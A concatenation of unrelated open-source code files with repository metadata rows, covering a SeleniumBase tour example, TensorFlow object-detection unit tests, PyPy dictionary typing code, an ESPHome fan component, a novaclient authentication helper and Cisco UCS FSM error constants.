# Same as: self.create_shepherd_tour(theme="dark")
self.create_tour(theme="dark")
self.add_tour_step("Welcome to Google!", title="SeleniumBase Tours")
self.add_tour_step("Type in your query here.", 'input[title="Search"]')
self.play_tour()
self.highlight_update_text('input[title="Search"]', "Google")
self.wait_for_element('[role="listbox"]') # Wait for autocomplete
# Create a website tour using the ShepherdJS library with "light" theme
# Same as: self.create_shepherd_tour(theme="light")
self.create_tour(theme="light")
self.add_tour_step("Then click to search.", '[value="Google Search"]')
self.add_tour_step("Or press [ENTER] after entry.", '[title="Search"]')
self.play_tour()
self.highlight_update_text('input[title="Search"]', "GitHub\n")
self.wait_for_element("#search")
# Create a website tour using the Bootstrap Tour JS library
# Same as: self.create_bootstrap_tour()
self.create_tour(theme="bootstrap")
self.add_tour_step("See Results Here!", title="(5-second autoplay)")
self.add_tour_step("Here's the next tour:")
self.play_tour(interval=5) # Tour automatically continues after 5 sec
self.open("https://www.google.com/maps/@42.3598616,-71.0912631,15z")
self.wait_for_element("#searchboxinput")
self.wait_for_element("#minimap")
self.wait_for_element("#zoom")
# Create a website tour using the IntroJS library
# Same as: self.create_introjs_tour()
self.create_tour(theme="introjs")
self.add_tour_step("Welcome to Google Maps!")
self.add_tour_step("Type in a location here.",
"#searchboxinput", title="Search Box")
self.add_tour_step("Then click here to show it on the map.",
"#searchbox-searchbutton", alignment="bottom")
self.add_tour_step("Or click here to get driving directions.",
"#searchbox-directions", alignment="bottom")
self.add_tour_step("Use this button to switch to Satellite view.",
"#minimap div.widget-minimap", alignment="right")
self.add_tour_step("Click here to zoom in.",
"#widget-zoom-in", alignment="left")
self.add_tour_step("Or click here to zoom out.",
"#widget-zoom-out", alignment="left")
self.add_tour_step("Use the Menu button to see more options.",
".searchbox-hamburger-container", alignment="right")
self.add_tour_step("Or click here to see more Google apps.",
'[title="Google apps"]', alignment="left")
self.add_tour_step("Thanks for using SeleniumBase Tours!",
title="End of Guided Tour")
self.export_tour() # The default name for exports is "my_tour.js"
self.play_tour()
| 49.606061 | 79 | 0.622175 | [
"MIT"
] | 1374250553/SeleniumBase | examples/tour_examples/google_tour.py | 3,274 | Python |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for utils.target_assigner_utils."""
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v1 as tf
from object_detection.utils import target_assigner_utils as ta_utils
from object_detection.utils import test_case
class TargetUtilTest(parameterized.TestCase, test_case.TestCase):
def test_image_shape_to_grids(self):
def graph_fn():
(y_grid, x_grid) = ta_utils.image_shape_to_grids(height=2, width=3)
return y_grid, x_grid
expected_y_grid = np.array([[0, 0, 0], [1, 1, 1]])
expected_x_grid = np.array([[0, 1, 2], [0, 1, 2]])
y_grid, x_grid = self.execute(graph_fn, [])
np.testing.assert_array_equal(y_grid, expected_y_grid)
np.testing.assert_array_equal(x_grid, expected_x_grid)
@parameterized.parameters((False,), (True,))
def test_coordinates_to_heatmap(self, sparse):
if not hasattr(tf, 'tensor_scatter_nd_max'):
self.skipTest('Cannot test function due to old TF version.')
def graph_fn():
(y_grid, x_grid) = ta_utils.image_shape_to_grids(height=3, width=5)
y_coordinates = tf.constant([1.5, 0.5], dtype=tf.float32)
x_coordinates = tf.constant([2.5, 4.5], dtype=tf.float32)
sigma = tf.constant([0.1, 0.5], dtype=tf.float32)
channel_onehot = tf.constant([[1, 0, 0], [0, 1, 0]], dtype=tf.float32)
channel_weights = tf.constant([1, 1], dtype=tf.float32)
heatmap = ta_utils.coordinates_to_heatmap(y_grid, x_grid, y_coordinates,
x_coordinates, sigma,
channel_onehot,
channel_weights, sparse=sparse)
return heatmap
heatmap = self.execute(graph_fn, [])
# Peak at (1, 2) for the first class.
self.assertAlmostEqual(1.0, heatmap[1, 2, 0])
# Peak at (0, 4) for the second class.
self.assertAlmostEqual(1.0, heatmap[0, 4, 1])
def test_compute_floor_offsets_with_indices_onlysource(self):
def graph_fn():
y_source = tf.constant([1.5, 0.3], dtype=tf.float32)
x_source = tf.constant([2.5, 4.2], dtype=tf.float32)
(offsets, indices) = ta_utils.compute_floor_offsets_with_indices(
y_source, x_source)
return offsets, indices
offsets, indices = self.execute(graph_fn, [])
np.testing.assert_array_almost_equal(offsets,
np.array([[0.5, 0.5], [0.3, 0.2]]))
np.testing.assert_array_almost_equal(indices,
np.array([[1, 2], [0, 4]]))
def test_compute_floor_offsets_with_indices_and_targets(self):
def graph_fn():
y_source = tf.constant([1.5, 0.3], dtype=tf.float32)
x_source = tf.constant([2.5, 4.2], dtype=tf.float32)
y_target = tf.constant([2.1, 0.1], dtype=tf.float32)
x_target = tf.constant([1.2, 4.5], dtype=tf.float32)
(offsets, indices) = ta_utils.compute_floor_offsets_with_indices(
y_source, x_source, y_target, x_target)
return offsets, indices
offsets, indices = self.execute(graph_fn, [])
np.testing.assert_array_almost_equal(offsets,
np.array([[1.1, -0.8], [0.1, 0.5]]))
np.testing.assert_array_almost_equal(indices, np.array([[1, 2], [0, 4]]))
def test_compute_floor_offsets_with_indices_multisources(self):
def graph_fn():
y_source = tf.constant([[1.0, 0.0], [2.0, 3.0]], dtype=tf.float32)
x_source = tf.constant([[2.0, 4.0], [3.0, 3.0]], dtype=tf.float32)
y_target = tf.constant([2.1, 0.1], dtype=tf.float32)
x_target = tf.constant([1.2, 4.5], dtype=tf.float32)
(offsets, indices) = ta_utils.compute_floor_offsets_with_indices(
y_source, x_source, y_target, x_target)
return offsets, indices
offsets, indices = self.execute(graph_fn, [])
# Offset from the first source to target.
np.testing.assert_array_almost_equal(offsets[:, 0, :],
np.array([[1.1, -0.8], [-1.9, 1.5]]))
# Offset from the second source to target.
np.testing.assert_array_almost_equal(offsets[:, 1, :],
np.array([[2.1, -2.8], [-2.9, 1.5]]))
# Indices from the first source to target.
np.testing.assert_array_almost_equal(indices[:, 0, :],
np.array([[1, 2], [2, 3]]))
# Indices from the second source to target.
np.testing.assert_array_almost_equal(indices[:, 1, :],
np.array([[0, 4], [3, 3]]))
def test_get_valid_keypoints_mask(self):
def graph_fn():
class_onehot = tf.constant(
[[0, 0, 1, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 1]], dtype=tf.float32)
keypoints = tf.constant(
[[0.1, float('nan'), 0.2, 0.0],
[0.0, 0.0, 0.1, 0.9],
[3.2, 4.3, float('nan'), 0.2]],
dtype=tf.float32)
keypoint_coordinates = tf.stack([keypoints, keypoints], axis=2)
mask, keypoints_nan_to_zeros = ta_utils.get_valid_keypoint_mask_for_class(
keypoint_coordinates=keypoint_coordinates,
class_id=2,
class_onehot=class_onehot,
keypoint_indices=[1, 2])
return mask, keypoints_nan_to_zeros
keypoints = np.array([[0.0, 0.2],
[0.0, 0.1],
[4.3, 0.0]])
expected_mask = np.array([[0, 1], [0, 0], [1, 0]])
expected_keypoints = np.stack([keypoints, keypoints], axis=2)
mask, keypoints_nan_to_zeros = self.execute(graph_fn, [])
np.testing.assert_array_equal(mask, expected_mask)
np.testing.assert_array_almost_equal(keypoints_nan_to_zeros,
expected_keypoints)
def test_get_valid_keypoints_with_mask(self):
def graph_fn():
class_onehot = tf.constant(
[[0, 0, 1, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 1]], dtype=tf.float32)
keypoints = tf.constant(
[[0.1, float('nan'), 0.2, 0.0],
[0.0, 0.0, 0.1, 0.9],
[3.2, 4.3, float('nan'), 0.2]],
dtype=tf.float32)
keypoint_coordinates = tf.stack([keypoints, keypoints], axis=2)
weights = tf.constant([0.0, 0.0, 1.0])
mask, keypoints_nan_to_zeros = ta_utils.get_valid_keypoint_mask_for_class(
keypoint_coordinates=keypoint_coordinates,
class_id=2,
class_onehot=class_onehot,
class_weights=weights,
keypoint_indices=[1, 2])
return mask, keypoints_nan_to_zeros
expected_mask = np.array([[0, 0], [0, 0], [1, 0]])
keypoints = np.array([[0.0, 0.2],
[0.0, 0.1],
[4.3, 0.0]])
expected_keypoints = np.stack([keypoints, keypoints], axis=2)
mask, keypoints_nan_to_zeros = self.execute(graph_fn, [])
np.testing.assert_array_equal(mask, expected_mask)
np.testing.assert_array_almost_equal(keypoints_nan_to_zeros,
expected_keypoints)
def test_blackout_pixel_weights_by_box_regions(self):
def graph_fn():
boxes = tf.constant(
[[0.0, 0.0, 5, 5], [0.0, 0.0, 10.0, 20.0], [6.0, 12.0, 8.0, 18.0]],
dtype=tf.float32)
blackout = tf.constant([True, False, True], dtype=tf.bool)
blackout_pixel_weights_by_box_regions = tf.function(
ta_utils.blackout_pixel_weights_by_box_regions)
output = blackout_pixel_weights_by_box_regions(10, 20, boxes, blackout)
return output
output = self.execute(graph_fn, [])
# All zeros in region [0:6, 0:6].
self.assertAlmostEqual(np.sum(output[0:6, 0:6]), 0.0)
# All zeros in region [12:19, 6:9].
self.assertAlmostEqual(np.sum(output[6:9, 12:19]), 0.0)
# All other pixel weights should be 1.0.
# 20 * 10 - 6 * 6 - 3 * 7 = 143.0
self.assertAlmostEqual(np.sum(output), 143.0)
def test_blackout_pixel_weights_by_box_regions_zero_instance(self):
def graph_fn():
boxes = tf.zeros([0, 4], dtype=tf.float32)
blackout = tf.zeros([0], dtype=tf.bool)
blackout_pixel_weights_by_box_regions = tf.function(
ta_utils.blackout_pixel_weights_by_box_regions)
output = blackout_pixel_weights_by_box_regions(10, 20, boxes, blackout)
return output
output = self.execute(graph_fn, [])
# The output should be all 1s since there's no annotation provided.
np.testing.assert_array_equal(output, np.ones([10, 20], dtype=np.float32))
def test_get_surrounding_grids(self):
def graph_fn():
y_coordinates = tf.constant([0.5], dtype=tf.float32)
x_coordinates = tf.constant([4.5], dtype=tf.float32)
output = ta_utils.get_surrounding_grids(
height=3,
width=5,
y_coordinates=y_coordinates,
x_coordinates=x_coordinates,
radius=1)
return output
y_indices, x_indices, valid = self.execute(graph_fn, [])
# Five neighboring indices: [-1, 4] (out of bound), [0, 3], [0, 4],
# [0, 5] (out of bound), [1, 4].
np.testing.assert_array_almost_equal(
y_indices,
np.array([[0.0, 0.0, 0.0, 0.0, 1.0]]))
np.testing.assert_array_almost_equal(
x_indices,
np.array([[0.0, 3.0, 4.0, 0.0, 4.0]]))
self.assertAllEqual(valid, [[False, True, True, False, True]])
if __name__ == '__main__':
tf.test.main()
| 41.669355 | 81 | 0.596865 | [
"MIT"
] | DemonDamon/mask-detection-based-on-tf2odapi | object_detection/utils/target_assigner_utils_test.py | 10,334 | Python |
from pypy.tool.pairtype import pairtype
from pypy.annotation import model as annmodel
from pypy.objspace.flow.model import Constant
from pypy.rpython.lltypesystem import lltype
from pypy.rlib.rarithmetic import r_uint
from pypy.rlib.objectmodel import hlinvoke
from pypy.rpython import robject
from pypy.rlib import objectmodel
from pypy.rpython import rmodel
class __extend__(annmodel.SomeDict):
def rtyper_makerepr(self, rtyper):
dictkey = self.dictdef.dictkey
dictvalue = self.dictdef.dictvalue
s_key = dictkey .s_value
s_value = dictvalue.s_value
force_non_null = self.dictdef.force_non_null
if (s_key.__class__ is annmodel.SomeObject and s_key.knowntype == object and
s_value.__class__ is annmodel.SomeObject and s_value.knowntype == object):
return robject.pyobj_repr
else:
if dictkey.custom_eq_hash:
custom_eq_hash = lambda: (rtyper.getrepr(dictkey.s_rdict_eqfn),
rtyper.getrepr(dictkey.s_rdict_hashfn))
else:
custom_eq_hash = None
return rtyper.type_system.rdict.DictRepr(rtyper,
lambda: rtyper.getrepr(s_key),
lambda: rtyper.getrepr(s_value),
dictkey,
dictvalue,
custom_eq_hash,
force_non_null)
def rtyper_makekey(self):
self.dictdef.dictkey .dont_change_any_more = True
self.dictdef.dictvalue.dont_change_any_more = True
return (self.__class__, self.dictdef.dictkey, self.dictdef.dictvalue)
class AbstractDictRepr(rmodel.Repr):
def pickrepr(self, item_repr):
if self.custom_eq_hash:
return item_repr, item_repr
else:
return self._externalvsinternal(self.rtyper, item_repr)
pickkeyrepr = pickrepr
def compact_repr(self):
return 'DictR %s %s' % (self.key_repr.compact_repr(), self.value_repr.compact_repr())
def recast_value(self, llops, v):
return llops.convertvar(v, self.value_repr, self.external_value_repr)
def recast_key(self, llops, v):
return llops.convertvar(v, self.key_repr, self.external_key_repr)
def rtype_newdict(hop):
hop.inputargs() # no arguments expected
r_dict = hop.r_result
if r_dict == robject.pyobj_repr: # special case: SomeObject: SomeObject dicts!
cdict = hop.inputconst(robject.pyobj_repr, dict)
return hop.genop('simple_call', [cdict], resulttype = robject.pyobj_repr)
cDICT = hop.inputconst(lltype.Void, r_dict.DICT)
v_result = hop.gendirectcall(hop.rtyper.type_system.rdict.ll_newdict, cDICT)
return v_result
class AbstractDictIteratorRepr(rmodel.IteratorRepr):
def newiter(self, hop):
v_dict, = hop.inputargs(self.r_dict)
citerptr = hop.inputconst(lltype.Void, self.lowleveltype)
return hop.gendirectcall(self.ll_dictiter, citerptr, v_dict)
def rtype_next(self, hop):
variant = self.variant
v_iter, = hop.inputargs(self)
if variant in ('keys', 'values'):
c1 = hop.inputconst(lltype.Void, None)
else:
c1 = hop.inputconst(lltype.Void, hop.r_result.lowleveltype)
# record that we know about these two possible exceptions
hop.has_implicit_exception(StopIteration)
hop.has_implicit_exception(RuntimeError)
hop.exception_is_here()
v = hop.gendirectcall(self.ll_dictnext, c1, v_iter)
if variant == 'keys':
return self.r_dict.recast_key(hop.llops, v)
elif variant == 'values':
return self.r_dict.recast_value(hop.llops, v)
else:
return v
| 39.57 | 93 | 0.627496 | [
"MIT"
] | benoitc/pypy | pypy/rpython/rdict.py | 3,957 | Python |
import voluptuous as vol
from esphome.components import fan, output
import esphome.config_validation as cv
from esphome.const import CONF_HIGH, CONF_LOW, CONF_MAKE_ID, CONF_MEDIUM, CONF_NAME, \
CONF_OSCILLATION_OUTPUT, CONF_OUTPUT, CONF_SPEED, CONF_SPEED_COMMAND_TOPIC, \
CONF_SPEED_STATE_TOPIC
from esphome.cpp_generator import add, get_variable, variable
from esphome.cpp_types import App
PLATFORM_SCHEMA = cv.nameable(fan.FAN_PLATFORM_SCHEMA.extend({
cv.GenerateID(CONF_MAKE_ID): cv.declare_variable_id(fan.MakeFan),
vol.Required(CONF_OUTPUT): cv.use_variable_id(output.FloatOutput),
vol.Optional(CONF_SPEED_STATE_TOPIC): cv.publish_topic,
vol.Optional(CONF_SPEED_COMMAND_TOPIC): cv.subscribe_topic,
vol.Optional(CONF_OSCILLATION_OUTPUT): cv.use_variable_id(output.BinaryOutput),
vol.Optional(CONF_SPEED): cv.Schema({
vol.Required(CONF_LOW): cv.percentage,
vol.Required(CONF_MEDIUM): cv.percentage,
vol.Required(CONF_HIGH): cv.percentage,
}),
}).extend(cv.COMPONENT_SCHEMA.schema))
def to_code(config):
for output_ in get_variable(config[CONF_OUTPUT]):
yield
rhs = App.make_fan(config[CONF_NAME])
fan_struct = variable(config[CONF_MAKE_ID], rhs)
if CONF_SPEED in config:
speeds = config[CONF_SPEED]
add(fan_struct.Poutput.set_speed(output_,
speeds[CONF_LOW],
speeds[CONF_MEDIUM],
speeds[CONF_HIGH]))
else:
add(fan_struct.Poutput.set_speed(output_))
if CONF_OSCILLATION_OUTPUT in config:
for oscillation_output in get_variable(config[CONF_OSCILLATION_OUTPUT]):
yield
add(fan_struct.Poutput.set_oscillation(oscillation_output))
fan.setup_fan(fan_struct.Pstate, config)
| 41.044444 | 86 | 0.707093 | [
"MIT"
] | Russel-dox/ESPHome | esphome/components/fan/speed.py | 1,847 | Python |
print()
print("--- Math ---")
print(1+1)
print(1*3)
print(1/2)
print(3**2)
print(4%2)
print(4%2 == 0)
print(type(1))
print(type(1.0)) | 13.3 | 21 | 0.586466 | [
"MIT"
] | augustoscher/python-excercises | basics/math.py | 133 | Python |
import os
from keystoneauth1.identity import v3
from keystoneauth1 import session
from novaclient import client
VERSION=2
AUTH_URL=os.getenv("OS_AUTH_URL")
USERNAME=os.getenv("OS_USERNAME")
PASSWORD=os.getenv("OS_PASSWORD")
PROJECT_ID=os.getenv("OS_PROJECT_ID")
PROJECT_NAME=os.getenv("OS_PROJECT_NAME")
USER_DOMAIN_ID=os.getenv("OS_USER_DOMAIN_ID")
PROJECT_DOMAIN_ID=os.getenv("OS_PROJECT_DOMAIN_ID")
CACERT=os.getenv("OS_CACERT")
def auth():
auth = v3.Password(auth_url=AUTH_URL, username=USERNAME, password=PASSWORD,
project_name=PROJECT_NAME, user_domain_id=USER_DOMAIN_ID,
project_domain_id=PROJECT_DOMAIN_ID)
sess = session.Session(auth=auth,verify=CACERT)
nova = client.Client(VERSION, session=sess)
return nova
| 31.791667 | 79 | 0.781127 | [
"Apache-2.0"
] | Manashree/I590-Projects-BigData-Software | src/hw-5/lib/nclient.py | 763 | Python |
"""This module contains the general information for IdentMetaSystemFsm ManagedObject."""
from ...ucsmo import ManagedObject
from ...ucscoremeta import MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class IdentMetaSystemFsmConsts:
COMPLETION_TIME_ = ""
CURRENT_FSM_NOP = "nop"
CURRENT_FSM_SYNC = "sync"
CURRENT_FSM_UCSC_UNIV_SYNC = "ucscUnivSync"
FSM_STATUS_FAIL = "fail"
FSM_STATUS_IN_PROGRESS = "inProgress"
FSM_STATUS_NOP = "nop"
FSM_STATUS_PENDING = "pending"
FSM_STATUS_SKIP = "skip"
FSM_STATUS_SUCCESS = "success"
FSM_STATUS_THROTTLED = "throttled"
RMT_ERR_CODE_ERR_2FA_AUTH_RETRY = "ERR-2fa-auth-retry"
RMT_ERR_CODE_ERR_ACTIVATE_FAILED = "ERR-ACTIVATE-failed"
RMT_ERR_CODE_ERR_ACTIVATE_IN_PROGRESS = "ERR-ACTIVATE-in-progress"
RMT_ERR_CODE_ERR_ACTIVATE_RETRY = "ERR-ACTIVATE-retry"
RMT_ERR_CODE_ERR_BIOS_TOKENS_OLD_BIOS = "ERR-BIOS-TOKENS-OLD-BIOS"
RMT_ERR_CODE_ERR_BIOS_TOKENS_OLD_CIMC = "ERR-BIOS-TOKENS-OLD-CIMC"
RMT_ERR_CODE_ERR_BIOS_NETWORK_BOOT_ORDER_NOT_FOUND = "ERR-BIOS-network-boot-order-not-found"
RMT_ERR_CODE_ERR_BOARDCTRLUPDATE_IGNORE = "ERR-BOARDCTRLUPDATE-ignore"
RMT_ERR_CODE_ERR_DIAG_CANCELLED = "ERR-DIAG-cancelled"
RMT_ERR_CODE_ERR_DIAG_FSM_RESTARTED = "ERR-DIAG-fsm-restarted"
RMT_ERR_CODE_ERR_DIAG_TEST_FAILED = "ERR-DIAG-test-failed"
RMT_ERR_CODE_ERR_DNLD_AUTHENTICATION_FAILURE = "ERR-DNLD-authentication-failure"
RMT_ERR_CODE_ERR_DNLD_HOSTKEY_MISMATCH = "ERR-DNLD-hostkey-mismatch"
RMT_ERR_CODE_ERR_DNLD_INVALID_IMAGE = "ERR-DNLD-invalid-image"
RMT_ERR_CODE_ERR_DNLD_NO_FILE = "ERR-DNLD-no-file"
RMT_ERR_CODE_ERR_DNLD_NO_SPACE = "ERR-DNLD-no-space"
RMT_ERR_CODE_ERR_DNLD_USB_UNMOUNTED = "ERR-DNLD-usb-unmounted"
RMT_ERR_CODE_ERR_DNS_DELETE_ERROR = "ERR-DNS-delete-error"
RMT_ERR_CODE_ERR_DNS_GET_ERROR = "ERR-DNS-get-error"
RMT_ERR_CODE_ERR_DNS_SET_ERROR = "ERR-DNS-set-error"
RMT_ERR_CODE_ERR_DIAGNOSTICS_IN_PROGRESS = "ERR-Diagnostics-in-progress"
RMT_ERR_CODE_ERR_DIAGNOSTICS_MEMTEST_IN_PROGRESS = "ERR-Diagnostics-memtest-in-progress"
RMT_ERR_CODE_ERR_DIAGNOSTICS_NETWORK_IN_PROGRESS = "ERR-Diagnostics-network-in-progress"
RMT_ERR_CODE_ERR_FILTER_ILLEGAL_FORMAT = "ERR-FILTER-illegal-format"
RMT_ERR_CODE_ERR_FSM_NO_SUCH_STATE = "ERR-FSM-no-such-state"
RMT_ERR_CODE_ERR_HOST_FRU_IDENTITY_MISMATCH = "ERR-HOST-fru-identity-mismatch"
RMT_ERR_CODE_ERR_HTTP_SET_ERROR = "ERR-HTTP-set-error"
RMT_ERR_CODE_ERR_HTTPS_SET_ERROR = "ERR-HTTPS-set-error"
RMT_ERR_CODE_ERR_IBMC_ANALYZE_RESULTS = "ERR-IBMC-analyze-results"
RMT_ERR_CODE_ERR_IBMC_CONNECT_ERROR = "ERR-IBMC-connect-error"
RMT_ERR_CODE_ERR_IBMC_CONNECTOR_INFO_RETRIEVAL_ERROR = "ERR-IBMC-connector-info-retrieval-error"
RMT_ERR_CODE_ERR_IBMC_FRU_RETRIEVAL_ERROR = "ERR-IBMC-fru-retrieval-error"
RMT_ERR_CODE_ERR_IBMC_INVALID_END_POINT_CONFIG = "ERR-IBMC-invalid-end-point-config"
RMT_ERR_CODE_ERR_IBMC_RESULTS_NOT_READY = "ERR-IBMC-results-not-ready"
RMT_ERR_CODE_ERR_MAX_SUBSCRIPTIONS_ALLOWED_ERROR = "ERR-MAX-subscriptions-allowed-error"
RMT_ERR_CODE_ERR_MO_CONFIG_CHILD_OBJECT_CANT_BE_CONFIGURED = "ERR-MO-CONFIG-child-object-cant-be-configured"
RMT_ERR_CODE_ERR_MO_META_NO_SUCH_OBJECT_CLASS = "ERR-MO-META-no-such-object-class"
RMT_ERR_CODE_ERR_MO_PROPERTY_NO_SUCH_PROPERTY = "ERR-MO-PROPERTY-no-such-property"
RMT_ERR_CODE_ERR_MO_PROPERTY_VALUE_OUT_OF_RANGE = "ERR-MO-PROPERTY-value-out-of-range"
RMT_ERR_CODE_ERR_MO_ACCESS_DENIED = "ERR-MO-access-denied"
RMT_ERR_CODE_ERR_MO_DELETION_RULE_VIOLATION = "ERR-MO-deletion-rule-violation"
RMT_ERR_CODE_ERR_MO_DUPLICATE_OBJECT = "ERR-MO-duplicate-object"
RMT_ERR_CODE_ERR_MO_ILLEGAL_CONTAINMENT = "ERR-MO-illegal-containment"
RMT_ERR_CODE_ERR_MO_ILLEGAL_CREATION = "ERR-MO-illegal-creation"
RMT_ERR_CODE_ERR_MO_ILLEGAL_ITERATOR_STATE = "ERR-MO-illegal-iterator-state"
RMT_ERR_CODE_ERR_MO_ILLEGAL_OBJECT_LIFECYCLE_TRANSITION = "ERR-MO-illegal-object-lifecycle-transition"
RMT_ERR_CODE_ERR_MO_NAMING_RULE_VIOLATION = "ERR-MO-naming-rule-violation"
RMT_ERR_CODE_ERR_MO_OBJECT_NOT_FOUND = "ERR-MO-object-not-found"
RMT_ERR_CODE_ERR_MO_RESOURCE_ALLOCATION = "ERR-MO-resource-allocation"
RMT_ERR_CODE_ERR_NTP_DELETE_ERROR = "ERR-NTP-delete-error"
RMT_ERR_CODE_ERR_NTP_GET_ERROR = "ERR-NTP-get-error"
RMT_ERR_CODE_ERR_NTP_SET_ERROR = "ERR-NTP-set-error"
RMT_ERR_CODE_ERR_POWER_CAP_UNSUPPORTED = "ERR-POWER-CAP-UNSUPPORTED"
RMT_ERR_CODE_ERR_POWER_PROFILE_IN_PROGRESS = "ERR-POWER-PROFILE-IN-PROGRESS"
RMT_ERR_CODE_ERR_SERVER_MIS_CONNECT = "ERR-SERVER-mis-connect"
RMT_ERR_CODE_ERR_SWITCH_INVALID_IF_CONFIG = "ERR-SWITCH-invalid-if-config"
RMT_ERR_CODE_ERR_TOKEN_REQUEST_DENIED = "ERR-TOKEN-request-denied"
RMT_ERR_CODE_ERR_UNABLE_TO_FETCH_BIOS_SETTINGS = "ERR-UNABLE-TO-FETCH-BIOS-SETTINGS"
RMT_ERR_CODE_ERR_UPDATE_FAILED = "ERR-UPDATE-failed"
RMT_ERR_CODE_ERR_UPDATE_IN_PROGRESS = "ERR-UPDATE-in-progress"
RMT_ERR_CODE_ERR_UPDATE_RETRY = "ERR-UPDATE-retry"
RMT_ERR_CODE_ERR_AAA_CONFIG_MODIFY_ERROR = "ERR-aaa-config-modify-error"
RMT_ERR_CODE_ERR_ACCT_REALM_SET_ERROR = "ERR-acct-realm-set-error"
RMT_ERR_CODE_ERR_ADMIN_PASSWD_SET = "ERR-admin-passwd-set"
RMT_ERR_CODE_ERR_AUTH_ISSUE = "ERR-auth-issue"
RMT_ERR_CODE_ERR_AUTH_REALM_GET_ERROR = "ERR-auth-realm-get-error"
RMT_ERR_CODE_ERR_AUTH_REALM_SET_ERROR = "ERR-auth-realm-set-error"
RMT_ERR_CODE_ERR_AUTHENTICATION = "ERR-authentication"
RMT_ERR_CODE_ERR_AUTHORIZATION_REQUIRED = "ERR-authorization-required"
RMT_ERR_CODE_ERR_CLI_SESSION_LIMIT_REACHED = "ERR-cli-session-limit-reached"
RMT_ERR_CODE_ERR_CREATE_KEYRING = "ERR-create-keyring"
RMT_ERR_CODE_ERR_CREATE_LOCALE = "ERR-create-locale"
RMT_ERR_CODE_ERR_CREATE_ROLE = "ERR-create-role"
RMT_ERR_CODE_ERR_CREATE_TP = "ERR-create-tp"
RMT_ERR_CODE_ERR_CREATE_USER = "ERR-create-user"
RMT_ERR_CODE_ERR_DELETE_LOCALE = "ERR-delete-locale"
RMT_ERR_CODE_ERR_DELETE_ROLE = "ERR-delete-role"
RMT_ERR_CODE_ERR_DELETE_SESSION = "ERR-delete-session"
RMT_ERR_CODE_ERR_DELETE_USER = "ERR-delete-user"
RMT_ERR_CODE_ERR_DOWNGRADE_FAIL = "ERR-downgrade-fail"
RMT_ERR_CODE_ERR_EFI_DIAGNOSTICS_IN_PROGRESS = "ERR-efi-Diagnostics--in-progress"
RMT_ERR_CODE_ERR_ENABLE_MGMT_CONN = "ERR-enable-mgmt-conn"
RMT_ERR_CODE_ERR_EP_SET_ERROR = "ERR-ep-set-error"
RMT_ERR_CODE_ERR_GET_MAX_HTTP_USER_SESSIONS = "ERR-get-max-http-user-sessions"
RMT_ERR_CODE_ERR_HTTP_INITIALIZING = "ERR-http-initializing"
RMT_ERR_CODE_ERR_INSUFFICIENTLY_EQUIPPED = "ERR-insufficiently-equipped"
RMT_ERR_CODE_ERR_INTERNAL_ERROR = "ERR-internal-error"
RMT_ERR_CODE_ERR_LDAP_DELETE_ERROR = "ERR-ldap-delete-error"
RMT_ERR_CODE_ERR_LDAP_GET_ERROR = "ERR-ldap-get-error"
RMT_ERR_CODE_ERR_LDAP_GROUP_MODIFY_ERROR = "ERR-ldap-group-modify-error"
RMT_ERR_CODE_ERR_LDAP_GROUP_SET_ERROR = "ERR-ldap-group-set-error"
RMT_ERR_CODE_ERR_LDAP_SET_ERROR = "ERR-ldap-set-error"
RMT_ERR_CODE_ERR_LOCALE_SET_ERROR = "ERR-locale-set-error"
RMT_ERR_CODE_ERR_MAX_USERID_SESSIONS_REACHED = "ERR-max-userid-sessions-reached"
RMT_ERR_CODE_ERR_MISSING_METHOD = "ERR-missing-method"
RMT_ERR_CODE_ERR_MODIFY_LOCALE = "ERR-modify-locale"
RMT_ERR_CODE_ERR_MODIFY_ROLE = "ERR-modify-role"
RMT_ERR_CODE_ERR_MODIFY_USER = "ERR-modify-user"
RMT_ERR_CODE_ERR_MODIFY_USER_LOCALE = "ERR-modify-user-locale"
RMT_ERR_CODE_ERR_MODIFY_USER_ROLE = "ERR-modify-user-role"
RMT_ERR_CODE_ERR_PROVIDER_GROUP_MODIFY_ERROR = "ERR-provider-group-modify-error"
RMT_ERR_CODE_ERR_PROVIDER_GROUP_SET_ERROR = "ERR-provider-group-set-error"
RMT_ERR_CODE_ERR_RADIUS_GET_ERROR = "ERR-radius-get-error"
RMT_ERR_CODE_ERR_RADIUS_GLOBAL_SET_ERROR = "ERR-radius-global-set-error"
RMT_ERR_CODE_ERR_RADIUS_GROUP_SET_ERROR = "ERR-radius-group-set-error"
RMT_ERR_CODE_ERR_RADIUS_SET_ERROR = "ERR-radius-set-error"
RMT_ERR_CODE_ERR_REQUEST_TIMEOUT = "ERR-request-timeout"
RMT_ERR_CODE_ERR_RESET_ADAPTER = "ERR-reset-adapter"
RMT_ERR_CODE_ERR_ROLE_SET_ERROR = "ERR-role-set-error"
RMT_ERR_CODE_ERR_SECONDARY_NODE = "ERR-secondary-node"
RMT_ERR_CODE_ERR_SERVICE_NOT_READY = "ERR-service-not-ready"
RMT_ERR_CODE_ERR_SESSION_CACHE_FULL = "ERR-session-cache-full"
RMT_ERR_CODE_ERR_SESSION_NOT_FOUND = "ERR-session-not-found"
RMT_ERR_CODE_ERR_SET_KEY_CERT = "ERR-set-key-cert"
RMT_ERR_CODE_ERR_SET_LOGIN_PROFILE = "ERR-set-login-profile"
RMT_ERR_CODE_ERR_SET_MIN_PASSPHRASE_LENGTH = "ERR-set-min-passphrase-length"
RMT_ERR_CODE_ERR_SET_NETWORK = "ERR-set-network"
RMT_ERR_CODE_ERR_SET_PASSWORD_STRENGTH_CHECK = "ERR-set-password-strength-check"
RMT_ERR_CODE_ERR_SET_PORT_CHANNEL = "ERR-set-port-channel"
RMT_ERR_CODE_ERR_STORE_PRE_LOGIN_BANNER_MSG = "ERR-store-pre-login-banner-msg"
RMT_ERR_CODE_ERR_TACACS_ENABLE_ERROR = "ERR-tacacs-enable-error"
RMT_ERR_CODE_ERR_TACACS_GLOBAL_SET_ERROR = "ERR-tacacs-global-set-error"
RMT_ERR_CODE_ERR_TACACS_GROUP_SET_ERROR = "ERR-tacacs-group-set-error"
